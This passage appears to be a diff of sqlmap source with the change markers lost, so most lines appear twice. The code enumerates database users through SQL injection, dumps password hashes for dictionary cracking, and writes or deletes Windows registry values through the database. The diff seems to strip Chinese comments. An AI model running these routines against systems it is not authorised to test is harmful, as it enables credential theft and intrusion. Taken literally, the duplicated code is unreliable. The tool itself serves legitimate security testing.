raise SqlmapMissingMandatoryOptionException(errMsg)
else:
regVal = conf.regVal # 如果配置中指定了注册表值,则使用配置
regVal = conf.regVal
if not conf.regData:
msg = "which registry key value data do you want to write? "
regData = readInput(msg) # 读取用户输入的注册表数据
regData = readInput(msg)
if not regData:
raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
raise SqlmapMissingMandatoryOptionException(errMsg)
else:
regData = conf.regData # 如果配置中指定了注册表数据,则使用配置
regData = conf.regData
if not conf.regType:
default = "REG_SZ"
msg = "which registry key value data-type is it? "
msg += "[%s] " % default
regType = readInput(msg, default=default) # 读取用户输入的注册表类型默认使用REG_SZ
regType = readInput(msg, default=default)
else:
regType = conf.regType # 如果配置中指定了注册表类型,则使用配置
regType = conf.regType
infoMsg = "adding Windows registry path '%s\\%s' " % (regKey, regVal)
infoMsg += "with data '%s'. " % regData
infoMsg += "This will work only if the user running the database "
infoMsg += "process has privileges to modify the Windows registry."
logger.info(infoMsg) # 打印添加注册表信息
logger.info(infoMsg)
self.addRegKey(regKey, regVal, regType, regData) # 添加注册表键值
self.addRegKey(regKey, regVal, regType, regData)
def regDel(self):
"""
Deletes a value from the Windows registry.
删除Windows注册表中的值
"""
self._regInit() # 初始化注册表操作
self._regInit()
errMsg = "missing mandatory option" # 缺少必要参数的错误信息
errMsg = "missing mandatory option"
if not conf.regKey:
msg = "which registry key do you want to delete? "
regKey = readInput(msg) # 读取用户输入的注册表键
regKey = readInput(msg)
if not regKey:
raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
raise SqlmapMissingMandatoryOptionException(errMsg)
else:
regKey = conf.regKey # 如果配置中指定了注册表键,则使用配置
regKey = conf.regKey
if not conf.regVal:
msg = "which registry key value do you want to delete? "
regVal = readInput(msg) # 读取用户输入的注册表值
regVal = readInput(msg)
if not regVal:
raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
raise SqlmapMissingMandatoryOptionException(errMsg)
else:
regVal = conf.regVal # 如果配置中指定了注册表值,则使用配置
regVal = conf.regVal
message = "are you sure that you want to delete the Windows "
message += "registry path '%s\\%s? [y/N] " % (regKey, regVal)
if not readInput(message, default='N', boolean=True):
return # 如果用户选择不删除,则返回
return
infoMsg = "deleting Windows registry path '%s\\%s'. " % (regKey, regVal)
infoMsg += "This will work only if the user running the database "
infoMsg += "process has privileges to modify the Windows registry."
logger.info(infoMsg) # 打印删除注册表信息
logger.info(infoMsg)
self.delRegKey(regKey, regVal) # 删除注册表键值
self.delRegKey(regKey, regVal)

265
src/sqlmap-master/plugins/generic/users.py
Unescape View File

@ -52,100 +52,69 @@ from thirdparty.six.moves import zip as _zip
class Users(object):
"""
This class defines users' enumeration functionalities for plugins.
这个类定义了插件的用户枚举功能
"""
def __init__(self):
# 初始化用户相关的数据存储
kb.data.currentUser = "" # 当前用户
kb.data.isDba = None # 是否是DBA
kb.data.cachedUsers = [] # 缓存的用户列表
kb.data.cachedUsersPasswords = {} # 缓存的用户密码哈希
kb.data.cachedUsersPrivileges = {} # 缓存的用户权限
kb.data.cachedUsersRoles = {} # 缓存的用户角色
kb.data.currentUser = ""
kb.data.isDba = None
kb.data.cachedUsers = []
kb.data.cachedUsersPasswords = {}
kb.data.cachedUsersPrivileges = {}
kb.data.cachedUsersRoles = {}
def getCurrentUser(self):
"""
Retrieves the current database user.
获取当前数据库用户
"""
infoMsg = "fetching current user"
logger.info(infoMsg)
# 获取当前用户的SQL查询语句
query = queries[Backend.getIdentifiedDbms()].current_user.query
# 如果当前用户没有被获取过,则进行获取
if not kb.data.currentUser:
kb.data.currentUser = unArrayizeValue(inject.getValue(query))
return kb.data.currentUser
def isDba(self, user=None):
"""
Tests if the current or specified user is a DBA.
测试当前或指定用户是否是DBA数据库管理员
Args:
user (str, optional): 要测试的用户默认为None表示测试当前用户
Returns:
bool: 是否是DBA
"""
infoMsg = "testing if current user is DBA"
logger.info(infoMsg)
query = None
# 根据不同的数据库类型构造不同的SQL查询语句
if Backend.isDbms(DBMS.MYSQL):
self.getCurrentUser() # 先获取当前用户
self.getCurrentUser()
if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):
kb.data.isDba = "root" in (kb.data.currentUser or "") # Drizzle数据库通过用户名判断是否为root用户
kb.data.isDba = "root" in (kb.data.currentUser or "")
elif kb.data.currentUser:
query = queries[Backend.getIdentifiedDbms()].is_dba.query % kb.data.currentUser.split("@")[0] # 构建查询语句判断是否为MySQL的DBA
query = queries[Backend.getIdentifiedDbms()].is_dba.query % kb.data.currentUser.split("@")[0]
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and user is not None:
query = queries[Backend.getIdentifiedDbms()].is_dba.query2 % user # 构建查询语句判断是否为SQL Server或Sybase的DBA
query = queries[Backend.getIdentifiedDbms()].is_dba.query2 % user
else:
query = queries[Backend.getIdentifiedDbms()].is_dba.query # 构建查询语句判断是否为其他数据库的DBA
query = queries[Backend.getIdentifiedDbms()].is_dba.query
# 执行查询
if query:
query = agent.forgeCaseStatement(query) # 注入时构造Case语句
kb.data.isDba = inject.checkBooleanExpression(query) or False # 执行查询并判断是否为DBA
query = agent.forgeCaseStatement(query)
kb.data.isDba = inject.checkBooleanExpression(query) or False
return kb.data.isDba
def getUsers(self):
"""
Retrieves database users.
获取数据库用户
Returns:
list: 用户列表
"""
infoMsg = "fetching database users"
logger.info(infoMsg)
# 获取查询用户表的SQL查询语句
rootQuery = queries[Backend.getIdentifiedDbms()].users
# 判断是否需要使用不同的查询语句
condition = (Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")))
condition |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema)
# 优先使用union, error, query技术进行查询否则使用盲注技术
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):
query = rootQuery.inband.query3 # Drizzle数据库的查询语句
query = rootQuery.inband.query3
elif condition:
query = rootQuery.inband.query2 # 条件判断下的查询语句
query = rootQuery.inband.query2
else:
query = rootQuery.inband.query # 通用查询语句
query = rootQuery.inband.query
values = inject.getValue(query, blind=False, time=False) # 执行查询语句,获取用户列表
values = inject.getValue(query, blind=False, time=False)
# 处理返回的用户列表
if not isNoneValue(values):
kb.data.cachedUsers = []
for value in arrayizeValue(values):
@ -153,19 +122,18 @@ class Users(object):
if not isNoneValue(value):
kb.data.cachedUsers.append(value)
# 如果没有使用union, error, query技术获取到用户则使用盲注技术进行获取
if not kb.data.cachedUsers and isInferenceAvailable() and not conf.direct:
infoMsg = "fetching number of database users"
logger.info(infoMsg)
if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE):
query = rootQuery.blind.count3 # Drizzle数据库的查询语句
query = rootQuery.blind.count3
elif condition:
query = rootQuery.blind.count2 # 条件判断下的查询语句
query = rootQuery.blind.count2
else:
query = rootQuery.blind.count # 通用查询语句
query = rootQuery.blind.count
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 获取用户数量
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if count == 0:
return kb.data.cachedUsers
@ -174,9 +142,8 @@ class Users(object):
raise SqlmapNoneDataException(errMsg)
plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES
indexRange = getLimitRange(count, plusOne=plusOne) # 计算盲注的查询范围
indexRange = getLimitRange(count, plusOne=plusOne)
# 循环盲注查询用户
for index in indexRange:
if Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB):
query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ")
@ -199,16 +166,8 @@ class Users(object):
return kb.data.cachedUsers
def getPasswordHashes(self):
"""
Retrieves password hashes of database users.
获取数据库用户的密码哈希值
Returns:
dict: 用户名和密码哈希的字典
"""
infoMsg = "fetching database users password hashes"
# 获取查询密码哈希的SQL查询语句
rootQuery = queries[Backend.getIdentifiedDbms()].passwords
if conf.user == CURRENT_USER:
@ -218,7 +177,7 @@ class Users(object):
logger.info(infoMsg)
if conf.user and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
conf.user = conf.user.upper() # Oracle和DB2数据库的用户名为大写
conf.user = conf.user.upper()
if conf.user:
users = conf.user.split(',')
@ -228,31 +187,28 @@ class Users(object):
parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user)
if parsedUser:
users[users.index(user)] = parsedUser.groups()[0] # 处理MySQL的用户名格式去掉引号和@后面的部分
users[users.index(user)] = parsedUser.groups()[0]
else:
users = []
users = [_ for _ in users if _]
# 优先使用union, error, query技术进行查询否则使用盲注技术
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.inband.query2 # SQL Server 2005和2008的查询语句
query = rootQuery.inband.query2
else:
query = rootQuery.inband.query # 通用查询语句
query = rootQuery.inband.query
condition = rootQuery.inband.condition # 查询条件
condition = rootQuery.inband.condition
# 如果指定了用户,则加入查询条件
if conf.user:
query += " WHERE "
query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users))
# 处理Sybase数据库的特殊情况
if Backend.isDbms(DBMS.SYBASE):
getCurrentThreadData().disableStdOut = True
retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=False) # 使用pivotDumpTable函数获取用户名和密码哈希
retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=False)
if retVal:
for user, password in filterPairValues(_zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])):
@ -263,14 +219,13 @@ class Users(object):
getCurrentThreadData().disableStdOut = False
else:
values = inject.getValue(query, blind=False, time=False) # 执行查询,获取用户名和密码哈希
values = inject.getValue(query, blind=False, time=False)
if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values):
values = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), blind=False, time=False) # SQL Server的特殊情况替换函数
values = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), blind=False, time=False)
elif Backend.isDbms(DBMS.MYSQL) and (isNoneValue(values) or all(len(value) == 2 and (isNullValue(value[1]) or isNoneValue(value[1])) for value in values)):
values = inject.getValue(query.replace("authentication_string", "password"), blind=False, time=False) # MySQL的特殊情况替换字段
values = inject.getValue(query.replace("authentication_string", "password"), blind=False, time=False)
# 处理返回的用户名和密码哈希
for user, password in filterPairValues(values):
if not user or user == " ":
continue
@ -282,21 +237,19 @@ class Users(object):
else:
kb.data.cachedUsersPasswords[user].append(password)
# 如果没有使用union, error, query技术获取到密码哈希则使用盲注技术进行获取
if not kb.data.cachedUsersPasswords and isInferenceAvailable() and not conf.direct:
fallback = False
if not len(users):
users = self.getUsers() # 先获取用户列表
users = self.getUsers()
if Backend.isDbms(DBMS.MYSQL):
for user in users:
parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user)
if parsedUser:
users[users.index(user)] = parsedUser.groups()[0] # 处理MySQL的用户名格式去掉引号和@后面的部分
users[users.index(user)] = parsedUser.groups()[0]
# 处理Sybase数据库的特殊情况
if Backend.isDbms(DBMS.SYBASE):
getCurrentThreadData().disableStdOut = True
@ -315,9 +268,8 @@ class Users(object):
getCurrentThreadData().disableStdOut = False
else:
retrievedUsers = set() # 已获取密码哈希的用户
retrievedUsers = set()
# 循环盲注查询密码哈希
for user in users:
user = unArrayizeValue(user)
@ -325,26 +277,26 @@ class Users(object):
continue
if Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO):
count = 1 # Informix和Virtuoso数据库的特殊情况直接查询密码哈希
count = 1
else:
infoMsg = "fetching number of password hashes "
infoMsg += "for user '%s'" % user
logger.info(infoMsg)
if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.blind.count2 % user # SQL Server 2005和2008的查询语句
query = rootQuery.blind.count2 % user
else:
query = rootQuery.blind.count % user # 通用查询语句
query = rootQuery.blind.count % user
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 获取密码哈希数量
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
if Backend.isDbms(DBMS.MSSQL):
fallback = True
count = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # SQL Server的特殊情况替换函数
count = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
elif Backend.isDbms(DBMS.MYSQL):
fallback = True
count = inject.getValue(query.replace("authentication_string", "password"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # MySQL的特殊情况替换字段
count = inject.getValue(query.replace("authentication_string", "password"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
warnMsg = "unable to retrieve the number of password "
@ -358,34 +310,33 @@ class Users(object):
passwords = []
plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES
indexRange = getLimitRange(count, plusOne=plusOne) # 计算盲注的查询范围
indexRange = getLimitRange(count, plusOne=plusOne)
# 循环盲注查询密码哈希
for index in indexRange:
if Backend.isDbms(DBMS.MSSQL):
if Backend.isVersionWithin(("2005", "2008")):
query = rootQuery.blind.query2 % (user, index, user) # SQL Server 2005和2008的查询语句
query = rootQuery.blind.query2 % (user, index, user)
else:
query = rootQuery.blind.query % (user, index, user) # 通用查询语句
query = rootQuery.blind.query % (user, index, user)
if fallback:
query = query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr") # SQL Server的特殊情况替换函数
query = query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr")
elif Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO):
query = rootQuery.blind.query % (user,) # Informix和Virtuoso数据库的特殊情况
query = rootQuery.blind.query % (user,)
elif Backend.isDbms(DBMS.HSQLDB):
query = rootQuery.blind.query % (index, user) # HSQLDB数据库的特殊情况
query = rootQuery.blind.query % (index, user)
else:
query = rootQuery.blind.query % (user, index) # 通用查询语句
query = rootQuery.blind.query % (user, index)
if Backend.isDbms(DBMS.MYSQL):
if fallback:
query = query.replace("authentication_string", "password") # MySQL的特殊情况替换字段
query = query.replace("authentication_string", "password")
password = unArrayizeValue(inject.getValue(query, union=False, error=False))
password = parsePasswordHash(password) # 解析密码哈希
password = parsePasswordHash(password)
passwords.append(password)
@ -404,37 +355,26 @@ class Users(object):
logger.error(errMsg)
else:
for user in kb.data.cachedUsersPasswords:
kb.data.cachedUsersPasswords[user] = list(set(kb.data.cachedUsersPasswords[user])) # 去重密码哈希
kb.data.cachedUsersPasswords[user] = list(set(kb.data.cachedUsersPasswords[user]))
storeHashesToFile(kb.data.cachedUsersPasswords) # 保存密码哈希到文件
storeHashesToFile(kb.data.cachedUsersPasswords)
message = "do you want to perform a dictionary-based attack "
message += "against retrieved password hashes? [Y/n/q]"
choice = readInput(message, default='Y').upper() # 提示是否进行字典攻击
choice = readInput(message, default='Y').upper()
if choice == 'N':
pass
elif choice == 'Q':
raise SqlmapUserQuitException
else:
attackCachedUsersPasswords() # 进行字典攻击
attackCachedUsersPasswords()
return kb.data.cachedUsersPasswords
def getPrivileges(self, query2=False):
"""
Retrieves privileges of database users.
获取数据库用户的权限
Args:
query2 (bool, optional): 是否使用第二种查询方式默认为False
Returns:
tuple: 用户名和权限的字典以及DBA用户的集合
"""
infoMsg = "fetching database users privileges"
# 获取查询权限的SQL查询语句
rootQuery = queries[Backend.getIdentifiedDbms()].privileges
if conf.user == CURRENT_USER:
@ -461,38 +401,36 @@ class Users(object):
users = [_ for _ in users if _]
# Set containing the list of DBMS administrators
areAdmins = set() # 存储DBA用户的集合
areAdmins = set()
if not kb.data.cachedUsersPrivileges and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
query = rootQuery.inband.query2 # MySQL 5.0以下版本的查询语句
condition = rootQuery.inband.condition2 # MySQL 5.0以下版本的查询条件
query = rootQuery.inband.query2
condition = rootQuery.inband.condition2
elif Backend.isDbms(DBMS.ORACLE) and query2:
query = rootQuery.inband.query2 # Oracle的第二种查询方式
condition = rootQuery.inband.condition2 # Oracle的第二种查询条件
query = rootQuery.inband.query2
condition = rootQuery.inband.condition2
else:
query = rootQuery.inband.query # 通用查询语句
condition = rootQuery.inband.condition # 通用查询条件
query = rootQuery.inband.query
condition = rootQuery.inband.condition
# 如果指定了用户,则加入查询条件
if conf.user:
query += " WHERE "
if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
query += " OR ".join("%s LIKE '%%%s%%'" % (condition, user) for user in sorted(users)) # MySQL 5.0以上版本的查询条件
query += " OR ".join("%s LIKE '%%%s%%'" % (condition, user) for user in sorted(users))
else:
query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) # 通用查询条件
query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users))
values = inject.getValue(query, blind=False, time=False) # 执行查询语句,获取权限信息
values = inject.getValue(query, blind=False, time=False)
if not values and Backend.isDbms(DBMS.ORACLE) and not query2:
infoMsg = "trying with table 'USER_SYS_PRIVS'"
logger.info(infoMsg)
return self.getPrivileges(query2=True) # 如果没有获取到权限信息,尝试使用第二种查询方式
return self.getPrivileges(query2=True)
if not isNoneValue(values):
# 处理返回的权限信息
for value in values:
user = None
privileges = set()
@ -500,7 +438,7 @@ class Users(object):
for count in xrange(0, len(value or [])):
# The first column is always the username
if count == 0:
user = value[count] # 获取用户名
user = value[count]
# The other columns are the privileges
else:
@ -513,23 +451,23 @@ class Users(object):
# True, 0 otherwise
if Backend.isDbms(DBMS.PGSQL) and getUnicode(privilege).isdigit():
if int(privilege) == 1 and count in PGSQL_PRIVS:
privileges.add(PGSQL_PRIVS[count]) # PostgreSQL的权限处理
privileges.add(PGSQL_PRIVS[count])
# In MySQL >= 5.0 and Oracle we get the list
# of privileges as string
elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema) or Backend.getIdentifiedDbms() in (DBMS.VERTICA, DBMS.MIMERSQL, DBMS.CUBRID):
privileges.add(privilege) # MySQL 5.0以上版本和Oracle的权限处理
privileges.add(privilege)
# In MySQL < 5.0 we get Y if the privilege is
# True, N otherwise
elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
if privilege.upper() == 'Y':
privileges.add(MYSQL_PRIVS[count]) # MySQL 5.0以下版本的权限处理
privileges.add(MYSQL_PRIVS[count])
# In Firebird we get one letter for each privilege
elif Backend.isDbms(DBMS.FIREBIRD):
if privilege.strip() in FIREBIRD_PRIVS:
privileges.add(FIREBIRD_PRIVS[privilege.strip()]) # Firebird的权限处理
privileges.add(FIREBIRD_PRIVS[privilege.strip()])
# In DB2 we get Y or G if the privilege is
# True, N otherwise
@ -549,21 +487,21 @@ class Users(object):
i += 1
privileges.add(privilege) # DB2的权限处理
privileges.add(privilege)
if user in kb.data.cachedUsersPrivileges:
kb.data.cachedUsersPrivileges[user] = list(privileges.union(kb.data.cachedUsersPrivileges[user])) # 合并权限
kb.data.cachedUsersPrivileges[user] = list(privileges.union(kb.data.cachedUsersPrivileges[user]))
else:
kb.data.cachedUsersPrivileges[user] = list(privileges)
if not kb.data.cachedUsersPrivileges and isInferenceAvailable() and not conf.direct:
if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
conditionChar = "LIKE" # MySQL 5.0以上版本的模糊查询
conditionChar = "LIKE"
else:
conditionChar = "=" # 通用查询
conditionChar = "="
if not len(users):
users = self.getUsers() # 获取用户列表
users = self.getUsers()
if Backend.isDbms(DBMS.MYSQL):
for user in users:
@ -572,34 +510,33 @@ class Users(object):
if parsedUser:
users[users.index(user)] = parsedUser.groups()[0]
retrievedUsers = set() # 已获取权限的用户
retrievedUsers = set()
# 循环盲注查询权限
for user in users:
outuser = user
if user in retrievedUsers:
continue
if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
user = "%%%s%%" % user # MySQL 5.0以上版本的模糊查询
user = "%%%s%%" % user
if Backend.isDbms(DBMS.INFORMIX):
count = 1 # Informix数据库的特殊情况直接查询权限
count = 1
else:
infoMsg = "fetching number of privileges "
infoMsg += "for user '%s'" % outuser
logger.info(infoMsg)
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
query = rootQuery.blind.count2 % user # MySQL 5.0以下版本的查询语句
query = rootQuery.blind.count2 % user
elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
query = rootQuery.blind.count % (conditionChar, user) # MySQL 5.0以上版本的查询语句
query = rootQuery.blind.count % (conditionChar, user)
elif Backend.isDbms(DBMS.ORACLE) and query2:
query = rootQuery.blind.count2 % user # Oracle的第二种查询方式
query = rootQuery.blind.count2 % user
else:
query = rootQuery.blind.count % user # 通用查询语句
query = rootQuery.blind.count % user
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 获取权限数量
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
if not retrievedUsers and Backend.isDbms(DBMS.ORACLE) and not query2:
@ -619,22 +556,21 @@ class Users(object):
privileges = set()
plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES
indexRange = getLimitRange(count, plusOne=plusOne) # 计算盲注的查询范围
indexRange = getLimitRange(count, plusOne=plusOne)
# 循环盲注查询权限
for index in indexRange:
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
query = rootQuery.blind.query2 % (user, index) # MySQL 5.0以下版本的查询语句
query = rootQuery.blind.query2 % (user, index)
elif Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema:
query = rootQuery.blind.query % (conditionChar, user, index) # MySQL 5.0以上版本的查询语句
query = rootQuery.blind.query % (conditionChar, user, index)
elif Backend.isDbms(DBMS.ORACLE) and query2:
query = rootQuery.blind.query2 % (user, index) # Oracle的第二种查询方式
query = rootQuery.blind.query2 % (user, index)
elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query % (index, user) # Firebird数据库的查询语句
query = rootQuery.blind.query % (index, user)
elif Backend.isDbms(DBMS.INFORMIX):
query = rootQuery.blind.query % (user,) # Informix数据库的查询语句
query = rootQuery.blind.query % (user,)
else:
query = rootQuery.blind.query % (user, index) # 通用查询语句
query = rootQuery.blind.query % (user, index)
privilege = unArrayizeValue(inject.getValue(query, union=False, error=False))
@ -650,14 +586,14 @@ class Users(object):
for priv in privs:
if priv.isdigit() and int(priv) == 1 and i in PGSQL_PRIVS:
privileges.add(PGSQL_PRIVS[i]) # PostgreSQL的权限处理
privileges.add(PGSQL_PRIVS[i])
i += 1
# In MySQL >= 5.0 and Oracle we get the list
# of privileges as string
elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema) or Backend.getIdentifiedDbms() in (DBMS.VERTICA, DBMS.MIMERSQL, DBMS.CUBRID):
privileges.add(privilege) # MySQL 5.0以上版本和Oracle的权限处理
privileges.add(privilege)
# In MySQL < 5.0 we get Y if the privilege is
# True, N otherwise
@ -670,19 +606,19 @@ class Users(object):
if priv.upper() == 'Y':
for position, mysqlPriv in MYSQL_PRIVS.items():
if position == i:
privileges.add(mysqlPriv) # MySQL 5.0以下版本的权限处理
privileges.add(mysqlPriv)
i += 1
# In Firebird we get one letter for each privilege
elif Backend.isDbms(DBMS.FIREBIRD):
if privilege.strip() in FIREBIRD_PRIVS:
privileges.add(FIREBIRD_PRIVS[privilege.strip()]) # Firebird的权限处理
privileges.add(FIREBIRD_PRIVS[privilege.strip()])
# In Informix we get one letter for the highest privilege
elif Backend.isDbms(DBMS.INFORMIX):
if privilege.strip() in INFORMIX_PRIVS:
privileges.add(INFORMIX_PRIVS[privilege.strip()]) # Informix的权限处理
privileges.add(INFORMIX_PRIVS[privilege.strip()])
# In DB2 we get Y or G if the privilege is
# True, N otherwise
@ -697,7 +633,7 @@ class Users(object):
if priv.upper() in ('Y', 'G'):
for position, db2Priv in DB2_PRIVS.items():
if position == i:
privilege += ", " + db2Priv # DB2的权限处理
privilege += ", " + db2Priv
i += 1
@ -725,6 +661,13 @@ class Users(object):
for user, privileges in kb.data.cachedUsersPrivileges.items():
if isAdminFromPrivileges(privileges):
areAdmins.add(user) # 判断是否为DBA
areAdmins.add(user)
return (kb.data.cachedUsersPrivileges, areAdmins)
def getRoles(self, query2=False):
warnMsg = "on %s the concept of roles does not " % Backend.getIdentifiedDbms()
warnMsg += "exist. sqlmap will enumerate privileges instead"
logger.warning(warnMsg)
return (kb.data.cachedUsersPrivileges)
return self.getPrivileges(query2)

46
src/sqlmap-master/thirdparty/ansistrm/ansistrm.py vendored
Unescape View File

@ -7,7 +7,7 @@ import logging
import re
import sys
from lib.core.settings import IS_WIN # 导入一个设置用于判断是否在Windows系统上运行
from lib.core.settings import IS_WIN
if IS_WIN:
import ctypes
@ -16,15 +16,14 @@ if IS_WIN:
# Reference: https://gist.github.com/vsajip/758430
# https://github.com/ipython/ipython/issues/4252
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms686047%28v=vs.85%29.aspx
# 设置Windows API函数SetConsoleTextAttribute的参数和返回值类型
ctypes.windll.kernel32.SetConsoleTextAttribute.argtypes = [ctypes.wintypes.HANDLE, ctypes.wintypes.WORD]
ctypes.windll.kernel32.SetConsoleTextAttribute.restype = ctypes.wintypes.BOOL
def stdoutEncode(data): # 用于编码标准输出数据的函数
def stdoutEncode(data): # Cross-referenced function
return data
class ColorizingStreamHandler(logging.StreamHandler):
# 定义颜色名称到索引的映射
# color names to indices
color_map = {
'black': 0,
'red': 1,
@ -36,7 +35,7 @@ class ColorizingStreamHandler(logging.StreamHandler):
'white': 7,
}
# 定义日志级别到颜色和样式的映射
# levels to (background, foreground, bold/intense)
level_map = {
logging.DEBUG: (None, 'blue', False),
logging.INFO: (None, 'green', False),
@ -44,30 +43,25 @@ class ColorizingStreamHandler(logging.StreamHandler):
logging.ERROR: (None, 'red', False),
logging.CRITICAL: ('red', 'white', False)
}
csi = '\x1b[' # ANSI转义序列的前缀
reset = '\x1b[0m' # ANSI重置颜色的转义序列
bold = "\x1b[1m" # ANSI加粗的转义序列
disable_coloring = False # 是否禁用颜色
csi = '\x1b['
reset = '\x1b[0m'
bold = "\x1b[1m"
disable_coloring = False
@property
def is_tty(self):
# 检查流是否是终端
isatty = getattr(self.stream, 'isatty', None)
return isatty and isatty() and not self.disable_coloring
def emit(self, record):
# 发送日志记录
try:
message = stdoutEncode(self.format(record))
stream = self.stream
#如果当前流不是TTY直接写入消息
if not self.is_tty:
if message and message[0] == "\r":
message = message[1:]
stream.write(message)
#如果是TTY调用output_colorized方法来输出带颜色的消息
else:
self.output_colorized(message)
stream.write(getattr(self, 'terminator', '\n'))
@ -76,19 +70,15 @@ class ColorizingStreamHandler(logging.StreamHandler):
except (KeyboardInterrupt, SystemExit):
raise
except IOError:
#IO错误时什么也不做pass
pass
except:
#其他异常时调用handleError方法
self.handleError(record)
if not IS_WIN:
def output_colorized(self, message):
# 如果不是Windows系统直接写入消息
self.stream.write(message)
else:
ansi_esc = re.compile(r'\x1b\[((?:\d+)(?:;(?:\d+))*)m')
# 正则表达式用于匹配ANSI转义序列
nt_color_map = {
0: 0x00, # black
@ -102,32 +92,26 @@ class ColorizingStreamHandler(logging.StreamHandler):
}
def output_colorized(self, message):
# 如果是Windows系统解析ANSI转义序列并设置控制台颜色
parts = self.ansi_esc.split(message)
h = None
fd = getattr(self.stream, 'fileno', None)
#文件描述符有效并且是标准输出或标准错误获取对应的Windows句柄
if fd is not None:
fd = fd()
if fd in (1, 2): # stdout or stderr
h = ctypes.windll.kernel32.GetStdHandle(-10 - fd)
#循环处理分割后的消息部分
while parts:
text = parts.pop(0)
#如果部分是文本,写入并刷新流
if text:
self.stream.write(text)
self.stream.flush()
#如果还有部分,取出下一个部分作为参数
if parts:
params = parts.pop(0)
#如果句柄有效,将参数分割并转换为整数,初始化颜色代码
if h is not None:
params = [int(p) for p in params.split(';')]
color = 0
@ -147,12 +131,9 @@ class ColorizingStreamHandler(logging.StreamHandler):
ctypes.windll.kernel32.SetConsoleTextAttribute(h, color)
def _reset(self, message):
#重置消息的颜色
if not message.endswith(self.reset):
# 如果消息不以重置序列结尾,则添加重置序列
reset = self.reset
elif self.bold in message:
# 如果消息包含加粗,则在重置后加粗
